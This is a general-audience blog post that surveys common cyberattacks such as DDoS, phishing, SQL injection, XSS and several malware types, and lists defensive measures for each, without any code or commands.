From infiltrations on infrastructure to spear phishing and brute force, a hacker attack is happening every 39 seconds. Is this cyber attack stat sounds scary to you? Well, the list of cyber threats happen every day is huge and we aim to cover everything through this blog.
A Former Cisco CEO John Chambers once said,
“There are two types of companies: those that have been hacked, and those who don’t yet know they have been hacked.”
Can you defend something that you don’t know?
This is where hackers sophisticated techniques come in, that are not just targeting organizations with big numbers, even the identities of kids are not safe. It means, be it individuals, small-scale businesses, or large corporations, all are being impacted.
With the game up for cyber threats and hackers, individuals, organizations and their employees should take a step to deal with them; thanks to our craze for connecting everything to the internet, increasing the chances of breaches, vulnerabilities, and flaws.
If you’re still in the illusion that by changing passwords, your cybersecurity will be tightened, then sorry, those days are gone; the number of cyber attacks have increased tremendously, so should be the prevention landscape.
Malware and phishing must be familiar to you, but I am sure only a few geeks actually know the mechanics of these types of cyberattacks. Understanding the method of delivery will clarify the role of different cyber security controls required to combat such threats. It is highly discomforting being aware of the threats, but not knowing where they’re coming from and how to defend them.
In this walk-through, we are breaking down some of the most common forms of attack and how to defend yourself and your business from them; don’t worry I will keep my flashy vocabulary and intricate wordplay limited, complimenting visuals – this will be understandable to every netizen out there.
Let’s begin with the basics!
HACKER is HERE…. This is a small excerpt of what I have been doing to your cyber world.
The most Common yet Disastrous Cyber Threats
A cyber attack is any malact that targets computer information systems, computer networks, IT infrastructures, or personal computer devices, using different methods to steal, alter or destroy data or systems.
A cybersecurity threat is an act of seeking to damage data, steal data, or disrupt digital life in general. Cyberattacks include threats like computer viruses, Denial of Service (DoS) attacks, and data breaches; many recent cyber attacks are nuisances, some are quite serious, even potentially threaten human lives.
A cyberattack is a terminology that covers a large number of topics, but some of them are:
- Tampering systems and data
- Resource exploitation
- Unauthorized access to the system and accessing sensitive information
- Disrupting regular business’ functioning and its processes
- Using various attacks to encrypt data and extort money from victims
Though cyberattacks are carried out for varied purposes, using multiple techniques to execute those attacks, they have arsenals full of hacking tools and resources and would add more to the bucket if the need arises.
For now, let’s discuss the most common types of attacks that hackers are drawing upon to design deadlier variations.
Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
Imagine you’re in traffic on a one-lane road, with cars bumper-to-bumper as far as the eye can see. Normally this road never has more than a car or two, but due to the county fair, and since this road is the only way for visitors to leave the town. The road can’t handle the massive traffic, and as a result, it gets so packed up that no one can leave.
This is what happens to a website in a denial-of-service (DoS) attack; when a website captures more traffic than it was built to deal with, website’s server gets overloaded and will become near-to-impossible for the website to serve up its content to visitors who are trying to use it. Often, this kind of traffic overload is malicious potent, as an attacker floods the site with overwhelming traffic to shut it down for all users.
In some instances, these DDoS attacks are intentionally performed by many computers at the same time, known as a Distributed Denial-of-Service Attack (DDoS). This can be even more difficult to overcome as the attacker appearing from many different IP addresses simultaneously, making determining the source of the attack more difficult for network administrators and stopping the server from fulfilling legitimate requests, letting hackers extort the victim for money.
There are different versions of DoS and DDoS attacks;
- TCP SYN flood attack – An attacker exploits the buffer space during a Transmission Control Protocol (TCP) session initialization handshake.
- Smurf attack – This attack uses IP spoofing and the ICMP to saturate traffic on a target network with ICMP echo requests targeted at broadcast IP addresses.
- Teardrop attack – This attack causes the length and fragmentation offset fields in sequential Internet Protocol (IP) packets to overlap on the attacked host.
- Ping-of-death attack – This type of attack uses IP packets to ‘ping a target system with an IP (restricted) size over the maximum of 65,535 bytes.
- Botnets – Botnets are when the millions of systems infected with malware under hacker’s control to carry out DDoS attacks; they are often difficult to trace because they are located in different geographic locations.
DDoS attacks are not only rising, but are also getting bigger and more devastating than ever before; from websites to banks, it seems like no one is immune.
In fact, a 2017 report from Cisco reported that the number of DD0S attacks exceeding 1 gigabit per second, it would rise to 3.1 million by 2021.
Let’s detect and prevent DoS and DDoS attacks
When it comes to detection, there are different methods to choose from, like:
- Packet Analysis: When a high-performance DDoS mitigation device is deployed, it instantly detect and mitigate anomalies. This type of devices continuously processing incoming and outgoing traffic—this is known as asymmetric and symmetric processing.
- Flow Sampling: In this, the router samples packets and exports a datagram contained information about those packets; all routers support this type of technology, and it’s highly scalable too.
- Mirrored Data Packets: Although mirrored data packets don’t work in the path of traffic, but provide an in-depth analysis, and detect anomalies quickly. The only downy to this method is that it’s unable to scale up.
When a DDoS attack is detected, BGP (Border Gateway Protocol) host should send updates to ISP routers to route traffic heading to victim servers to a null-0 route at the next hop.
There are a few countermeasures to mitigate DoS and DDoS attack:
- Place servers behind a firewall to stop inbound SYN packets.
- Increase the size of the connection and decrease the timeout on open ones.
- Disable IP-directed broadcasts at the routers.
- Configure the end systems to keep from responding to ICMP packets from broadcast addresses.
- Ping of death can also be blocked by using a firewall that continuously checks the fragmented IP packets for maximum size.
- RFC3704 filtering, this denies traffic from spoofed addresses and ensure that traffic is traceable to its source network.
- Blackhole filtering to drop undesirable traffic before it enters a network.
Man-in-the-Middle (MitM) Attack
A MitM (man-in-the-middle) attack is where the attacker intercepts and relays messages between parties who believe that they are interacting with one and another. It is also known as eavesdropping, and once attackers are in the conversation, they can manipulate, filter, and steal sensitive information.
A MitM attack also use in the military to confuse enemies.
There are two common points of entry for MitM attacks:
- On unsecured public Wi-Fi, attackers put themselves between a device and the network. Without knowing, the user shares information through the attacker.
- Once a device has breached, an attacker installs software to process the victim’s information.
Some common types of man-in-the-middle attacks are:
- Session hijacking
In this type of attack, an attacker hijacks a network session between a client and a network server. The attacking computer substitutes its IP for the client while the server continues the session, believing if it is interacting with the client.
See how it works
- You connect to a server.
- The attacker gains control of it.
- The attacker disconnects you from the server.
- The attacker’s computer replaces your IP address with its own and spoofs your sequence numbers.
- Now, the attacker is in dialog with the server, and the server believes it is communicating with you.
- IP Spoofing
IP spoofing is another tactic of an attacker that convince your system that it is communicating with a known, trusted entity while providing him/her with access to your system. The attacker sends a packet with the IP source address of a trusted host instead of its own IP source to target a host. The targeted host possibly accepts the packet and act accordingly.
An attack happens when an attacker intercepts and saves our old messages and tries to send them later, impersonating the real you and me. This can be countered with session timestamps or nonce (a number or a string that changes timely).
How to counter Man-in-the-middle attacks?
Currently, there is no technology or configuration to prevent all sorts of MitM attacks.
Generally, encryption and digital certificates are quite an effective and safe practices against MitM attacks, securing both the confidentiality and integrity of communications.
But a MitM attack injected into the middle of communications in a way that encryption often gets out of help. So, how can you make sure that the IP you’re talking to does not belong to the attacker?
Certificate authorities and hash functions are created for this problem.
Anyways, one way to protect your organization from MitM attacks is to encrypt data, using technologies like VPN. Companies also put auditing and monitoring in place so that staff activities could be supervised regularly to keep their staff educated.
Another option could be verifying TLS/SSL setups.
Phishing and Spear-Phishing Attacks
As per dark reading, a cyber security news website, 91% of the phishing attacks are the results of a phishing email. Phishing which is a social engineering attack involves fraudulent communications that comes from a trusted source to steal information or trick people into installing malware.
Phishing scams have been hurting since the 1990s, complementing newer techniques, that’s why hackers are still a step ahead of users; phishing scams in the United States increased by 297 percent in 2018 compared to the previous year.
Phishing – being the easiest – is the leading cause of cyber security attacks in the world. It involves sending emails appearing to be from trusted entities. Such mails have a strong subject line with attachments – job offers, invoice, big offers – from known shipping services or an important email from higher officials of the company.
Spear phishing is somehow the same, but a more targeted approach, backed up by a bit more research on an individual target. With a little research, a phisher identify your colleague’s email addresses and send seemingly-legitimate email from a trusted source instructing you to download a file (malware), or even hand over the login details.
Because of this, spear phishing is hard to identify and harder to defend against; other than falsifying “From” section of the email, scammers also add credibility to their story by website cloning — copying legitimate websites to fool you into entering personally identifiable information (PII) or credentials.
You must be guessing how phishers reach to your email?
There are multiple ways scammers obtain your email address; the most prevalent are:
- Dishonest “subscribe” boxes
- Buying it illegally
- Harvesting programs ( use bots that crawl and scrape sites for email addresses)
- Data brokers
Other of Phishing Scams include;
Smishing is a kind of phishing scam that uses text messages to lure us into giving away our personal information, often sent through an online service and contain links to fake websites.
These are Phishing attacks involve getting a user to download malware; you will download malware that is disguised as an urgent update, pop-up, attachment, or even PDF. This downloaded malware will then redirect you to a fake version of a legitimate website they are trying to access.
Vishing is a form of attack that revolves around a phone call with the scammer themselves; they contact you requesting you to pass over personal information urgently.
Along with these, 2019 has already popped-up newer versions of social engineering attacks – biometric attacks, AI attacks, and IoT attacks.
How to protect against Phishing attacks?
- Staff must be trained to recognize fraudulent emails and what to do when they receive such – Phishing Staff Awareness Courses are can be of great help.
- Get used to of Email filtering technologies to avoid phishing attacks.
- Users can be trained about the correct protocols for password security.
- Look at email header “Reply-to” and “Return-Path” make sure it matches the source you believe the email is from.
- Stop for a minute and analyze the email.
- Hovering over the links — Move mouse over the link, but do not click it!
- Sandboxing — test email content in a sandbox environment, logging activity from opening the attachment or clicking the links within the email.
- If you receive an email requesting “urgent”, check with the company requesting the information.
- Never download anything, especially if a download request appeared as a pop-up on an insecure site (non-HTTPS).
- To avoid being targeted via an email harvesting program, do not share your address online in a way that can be copied.
SQL Injection Attack
Structured Query Language injection is the oldest trick in the world of cybercrime and yet the most effective; it is the same attack that once forced the PlayStation Network (PSN) to share the personal data of 77 million users.
An SQL injection occurs when a malefactor injects a malicious query into a SQL-powered server; as a result, the server is then forced to expose sensitive data from the database. The SQL injection attack is executed by typing a SQL query into an input field on a web page such as the log-in field or a search box.
An SQL Injection cannot only let the attacker peek into the database but also let them to modify (insert, update or delete) the data, run administrative commands, recover the content of a file, issue commands to the operating system, and even wipe out the database.
SQL injection is a common issue with database-driven websites and those who use dynamic SQL. Additionally, SQL injection is also common with PHP and ASP applications; thanks to their older functional interfaces. J2EE and ASP.NET applications are less vulnerable to SQL injections because of their programmatic interfaces.
How to prevent SQL injections?
Injections cyberattacks are, paradoxically damage the cause they can, very simple to avoid; here are some steps to prevent SQL injection attacks:
- Avoid using dynamic queries
- Integrate security checks (input validation)
- Provide parameterized database queries to deter attackers from changing queries intents (even if SQL commands have been inserted)
- Use stored procedures: they are not much effective but may have the same effect as parameterized queries.
- Use the input validations of blacklist and Whitelist.
- Use captcha queries (“I’m not a robot” boxes to tick) – to protect forms and better intern information processing.
- SQL injections can also be prevented using firewalls.
Passwords are the most commonly used mechanism, so does obtain them; accessing a person’s password can easily be obtained by looking around his/er desk, sniffing, using social engineering techniques, acquiring a password database or outright guessing.
The last approach can be done by a random or systematic manner.
Brute-force password guessing uses a random approach by trying different combinations of passwords by trying something related to the person’s job title, name, hobbies, or similar things.
While in a dictionary attack, a dictionary of common passwords is the lifeline to breach network and computer security – either to copy an encrypted file that contains the passwords, or apply the same encryption to a dictionary of commonly used passwords, and compare them.
To protect from password attacks;
- Implement an account lockout policy to make sure that the account gets locked after a few invalid attempts.
- Follow account lockout best practices to set it up correctly.
Drive-by download attack is another common practice of spreading malware; thanks to all insecure websites for helping hackers to plant a malicious script into HTTP or PHP code – visiting any of the websites means allowing malware to install.
It could also be possible when viewing an email message or a pop-up window; unlike others, this devil doesn’t need your actions to enable the attack actively.
A drive-by download can take advantage of an app, OS, or web browser that have security flaws due to lack of or failed updates.
How to prevent Drive-by downloads
- Keep your browsers and operating systems up to date to avoid websites with malicious code.
- Stick to the sites you normally use — even these sites can be hacked.
- Delete unnecessary programs and apps on your device – more plug-ins means more vulnerabilities to be exploited by drive-by attacks.
Cross-site Scripting (XSS) Attack
You must be getting bored with lengthy descriptions, how about a visual description?
I hope you got a pretty clear idea what cross-site scripting attack works.
XSS attacks use third-party web resources to run malicious scripts in the victim’s web browser or scriptable application; it might send the victim’s cookie to the attacker’s server, and the attacker extracts it and use it for session hijacking.
The most dangerous consequences are exploitation of further vulnerabilities; other than cookies, a hacker can log keystrokes, discover and collect network information, capture screenshots, and remotely access and control the victim’s machine.
Practices to avoid XSS attacks
To defend against XSS attacks, the best you can do is;
- Input validation: It is the process of ensuring an application is rendering the correct data and preventing unwanted data from harming the site, database, and users. Input validation is helpful in preventing a user from adding special characters into the fields, instead of refusing the request.
- Sanitizing: Another way to prevent cross-site scripting attacks is to sanitize user input – it’s a strong defense, but should not be used alone. It’s possible that you’ll find the need to use all three methods of prevention in battling XSS attacks. Sanitizing user input is helpful on sites that allow HTML markup to ensure that the data received do no harm to users as well as the database.
Malicious software described as unwanted software installed on your system without your consent, attaching itself to legitimate code and propagate while lurking in useful applications or replicate across the Internet.
Some of the most common types of malware are:
- Macro viruses — These viruses infect applications say Microsoft Word or Excel, attaching to an application’s initialization sequence. When the application is launched, the virus executes instructions before transferring control to the application. The virus replicates and attaches to other code in the computer system. Melissa Virus 1999s is the best example to quote.
- System or boot-record infectors — A boot-record virus attaches to the master boot on hard disks; upon launching the system, it will look for the boot sector and load the virus into memory, to propagate it to other disks and computers. In some cases, data disappear from partitions, while in other cases, the computer becomes unstable. Often the infected computer fails to start-up or find the hard drive.
- File infectors — File infector viruses attach themselves to executable code, such as .exe files, installed when the code is loaded. Another version of the same malware associates itself with a file by creating a virus file using the same name, but an .exe extension. They are often memory-resident, meaning once they have been executed, they remain in the computer’s memory and can infect further programs. Examples include Jerusalem and Cascade.
- Stealth viruses — Stealth viruses take over system functions to conceal themselves. They do this by compromising malware detection software so that the software will report an infected area. These viruses conceal any increase in the size of an infected file or changes to the file’s date and time of last modification.
- Trojans — A Trojan or a Trojan horse hides in a useful program with malicious intentions, but they do not self-replicate. Trojan can be backdoor, downloader, infostealer, remote access, and/or in the form of DDoS. Did you hear about – The Trojan Astaroth, that attacked 8000 machines in a week.
- Polymorphic — You will find these viruses somewhere between varying cycles of encryption and decryption, proceeds to infect an area of code. Such viruses are difficult to detect but have an entropy because of the modifications of their source code.
- Logic bombs — It is a type of malicious software appended to an application and is triggered by a specific occurrence, such as a logical condition or at a specific date and time. It means worms with logic bombs behaves differently at different times; thanks to Roger Duronio of UBS PaineWebber for successfully deploying a logic bomb against his employer.
- Worms — Worms do not attach to a host file, but are self-contained programs that propagate across computers to dissect network security. Worms spread through email attachments; opening the attachment activates the program. A typical worm exploit includes sending a copy of itself to every contact in an infected computer’s email address. Other than conducting malicious activities, a worm also spreads across the internet and overloading email servers cause DoS attacks. Worms could be of internet, email, instant messaging, IRC (Internet Relay Chat), File-sharing, etc. The most notorious worms are; The Morris Worm, The Storm Worm, and SQL Slammer.
- Droppers — A dropper is used to install viruses on computers, often is not infected with malicious code but connects the internet and download updates to virus software, residing on a compromised system.
- Ransomware — Ransomware, being one of the biggest cyber security threats of 2018, is a malware that blocks access to the victim’s data and threatens to delete and/or publish it unless a hefty amount of ransom is paid. Some simple ones lock the system that is not difficult for a knowledgeable person to reverse, more advanced ones uses a technique called cryptoviral extortion, encrypts the victim’s files in a way that nearly impossible to recover without the decryption key. The million-dollar ransomware is SamSam, that made $6 million in ransom payments, often demands $50,000 in bitcoin, and had caused $30 million in losses to victims.
- Adware — Adware is used by companies for marketing purposes; malvertising banners are displayed while the program is running. Adware can be automatically downloaded while browsing any website and can be viewed through pop-up windows or through a bar. Recently, 100 Apps linked to an Adware removed from Google Play.
- Spyware — Spyware is a program that is installed to collect information, tracking everything users do without their knowledge and sends the data to a remote user. It also acts as a downloader of other malicious programs from the internet. Spyware works like adware but installed unknowingly when you install any freeware application or software. If you’re a tourist than be careful! It came to light that the border control authority in China’s Xinjiang region was installing surveillance software on the devices of tourists without their consent.
Cyber Attacks in a nutshell – Malware Special!
Is Malware Preventable? Yes…
Following steps help you decrease the possibility of all types of Malware:
- Use a good quality anti-malware application.
- Do not execute any program unless you believe it is from a trusted source.
- Disable scripting functionality, cookie usage, and so on to avoid hacking attempts.
- Never open emails from unknown senders, especially those with attachments with the extensions .exe, or .vbs.
- Keep installing the latest patches available of your operating system.
- Scan DVDs, CDs, pen drives, or any external storage devices before using it.
- Do not accept programs from instant messaging applications.
- When you download any program, always scan them first.
- Backups are essential to reduce some of the impacts from a ransomware attack. All too often, organizations throw everything into a cesspool of files and folders, with no instructions as to where everything should go.
- Spam filtering for email-based attacks.
- Disable unnecessary exposed services.
- Change default/easy-to-guess passwords on all of your accounts, systems, and services.
Advanced Persistent Threat
An advanced persistent threat (APT) is a long yet targeted cyberattack in which an intruder access to a network but remains undetected for a period of time. The intention of an APT attack is to monitor network activity and grab the data rather than cause damage to the network or organization.
APT attacks target organizations in sectors like; national defense, manufacturing and the financial industry – those deal with high-value information, including military plans, intellectual property, and other data.
It is one of the most complicated cyber security attacks where you can’t track the source of the attack or the technique used. In fact, techniques like reconnaissance, discover and capture can be used to execute the APT attack.
To protect from APT attacks, you need to understand how APTs work.
Cryptocurrency hijacking is the new addition to this world of cyber vulnerabilities.
Digital currency and mining are becoming popular, not among wannabee millionaires but also cybercriminals – they found their evil benefit to the cryptocurrency mining.
Cryptocurrency investors and traders are an easy target for this attack.
“Cryptojacking” is a program to inject mining codes silently to the system, uses the CPU, GPU and power resources to mine for the cryptocurrency.
The reason why cryptojacking is becoming more popular is more money for less risk.
A crypto-hijacker either trick you into loading crypto-mining code onto your computer – using phishing-like tactics – and/or inject a script on a website or an ad to be delivered to multiple sites.
Unlike other threats, cryptojacking scripts do not damage computers or victims’ data, but do steal CPU processing resources; for individual users, slower performance might be an annoyance.
How to protect Cryptocurrency from cryptojacking?
- Keep your machines and systems patched and up-to-date
- Monitor for abnormal GPU and CPU usage
Inside attacks are way riskier and deadlier than any other attack, as they solely depend on the users and, often, the employees in an organization, but are not always intentional; sometimes attacks happen accidentally or due to employees’ negligence.
Types of threatening Insiders
- OBLIVIOUS INSIDER: Insiders with access to the company’s sensitive information that has been compromised from the outside; being monitored outside, these employees are oblivious to the act.
- MALICIOUS INSIDER: Insiders that intentionally access data, or destroy networks – such as an employee deletes company data on his/her last day of work.
- NEGLIGENT INSIDER: Insiders that are usually uneducated on potential security threats, or bypass protocol to meet workplace eﬃciency; these are most vulnerable to social engineering attacks.
- PROFESSIONAL INSIDER: Insiders making a career of exploiting companies’ vulnerabilities, and selling them on the DarkWeb.
Prevention against Insiders Attacks
- Load your security policy with procedures to detect and prevent misuse, coupled with the guidelines for conducting insider investigations.
- Start reviewing your policies, especially ones that deal with incident handling; focus sections that cover trusted insiders.
- Define who is allowed to access what data, under which circumstances, and with whom they can share.
- Keep unnecessary people away from critical infrastructure.
- Isolate high-value systems in limited zones.
- If possible, install network forensic analysis tools to analyze the flow of information.
- Practice strong multifactor authentication – t for sensitive applications or systems, say HR or accounting.
- Securing hosts; eliminate unused services, and lockdown configurations.
- Restricts your policy in disseminating confidential data.
- Start using the intrusion detection system (IDS).
- Use Email firewalls.
- Digital rights management tools could also be used to restrict the distribution of documents, accessing rights, and permissions.
It is a vulnerability in a system or software that hackers exploit before the vulnerability is patched by scanning devices or software to spot a weakness, create respective tools and then launch the attack.
When a network vulnerability is identified, there is a time before a patch or solution can be used to fix the issue. Within that time-frame, cyber attackers keep exploiting the vulnerability.
How to detect and protect against Zero-day exploits?
By their nature, these attacks are the most difficult to defend, thanks to its precise nature; these vulnerabilities are highly prized not only for cybercriminals, but for nation states too.
- Constant monitoring is a must.
- Infrastructure penetration testing can help in identifying the network’s vulnerabilities before cybercriminals do.
- Keep operating systems and application software up to date.
- Use virtual LANS by making use of a firewall.
- Protect against wireless malware with a secure Wi-Fi system.
- Stick to websites with SSL certificates.
Eavesdropping attacks occur by intercepting network traffic – an attacker obtains passwords, credit card numbers, and other information that a user sends over the network.
Eavesdropping can be passive or active:
- Passive — A hacker gets the information by listening to the message transmits in the network.
- Active — A hacker disguises himself as a friendly unit and sends queries to transmitters to grab the information; also called probing, scanning or tampering.
How to detect and prevent Eavesdropping attack?
Detecting passive eavesdropping is more important than spotting active ones since active requires the attacker to gain knowledge of the friendly units using passive eavesdropping approach first.
The best way to protect against eavesdropping attack is by using a VPN.
Birthday attacks are against hash algorithms used to verify the integrity of software, message, or digital signature. It is a type of cryptographic attack that exploits the mathematics of the birthday problem in probability theory, abusing communication between two or more parties. A message processed by a hash function produces a message digest (MD) of a fixed length, independent to the length of the message; this MD characterizes the message.
The birthday attack is the probability of finding two random messages with the same MD processed by a hash function.
Hacks are done, want some basic prevention practices?
Have a look!
Emerging Cyber Threats
Cyber threats are never static; millions are created every year.
Can you guess who is possibly be triggered to conduct a cyberattack and/or breach data?
Cyber security threats come from a number of places, people and contexts, including:
- Individuals – create attack vectors using their tools
- Criminal organizations, with large numbers of employees
- Organized crime groups
- Industrial spies
- Cunning insiders
- Business competitors
Thanks to Nation states for being the source of many of the most severe attacks; from basic espionage to others that are aimed at greater disruption.
There are “cyber weapons” too that are playing due role in the cyberwarfare. In some countries, the boundaries between national intelligence and criminal organizations are blurred, where the criminals doing the work of cyber espionage.
Many vulnerabilities are traded on the “dark web,” a disorganized yet widespread criminal warehouse of the Internet, where hackers can buy malware, ransomware, credentials for breached systems, and many more.
If you’re defending you and/or your business then I don’t think so hackers would ever get to know who you really are?
Best Practices for Cyber Protection
Cyber Defense for Businesses
Enterprise best practices include basic but important countermeasures like;
- Patching systems. When a tech vendor discovers (or informed of) a security flaw in their infrastructure or product, they write code that fixes or “patches” the problem. Patching should be done at least once a month; many attacks would fail if IT departments timely update all security patches.
A host of new technologies are floating onto the market, making it easier to mount a robust defense against increasing cyber threats, like:
- Outsourced security services
- Systems to enable collaboration between security teams
- Point solutions for phishing and secure browsing
- Continual attack simulation tools
Cyber Defense for Individuals
For individuals, the practices are simple.
The good news is that in most of the cases, some big security organizations stand between the consumer and the hacker, but still, there are preventative measures you should take to protect your data.
- Password hygiene: Big organizations cannot protect us against phishing or password hacks; it’s our duty to make it difficult for anyone to guess or hack.
- Be Cautious: Be careful in opening file attachments; phishing and spear-phishing emails look real and are easy an entrance for hackers to infect our systems – pay attention.
- Make use of Software: Subscribe to software like Antivirus, VPN, Firewall, etc. and please keep your system up to date with automated, scheduled scans.
Mounting cyber-defense requires an in-depth understanding of all the offense.
I have reviewed many of the most common cyber-security attacks that hackers around the world is using to disrupt and compromise information systems.
Have you noticed, attackers have many options – from malware infection, DDoS assaults, man-in-the-middle interception, brute-force password guessing, to trying to gain unauthorized access to infrastructures and sensitive data.
But, measures to mitigate them stay the same – Keep systems and anti-virus databases up to date, train employees, configure firewall to whitelist only the specific ports and needed hosts, make regular backups, keep passwords strong, use a least-privilege model, and continuously audit your systems for suspicious activity.
In an organization, effective Cyber Security approach is also needed where the people, computers, processes, networks and technology of an organization should be equally involved. If all of them complement each other then, it is highly possible to stand against the cyber threat and attacks.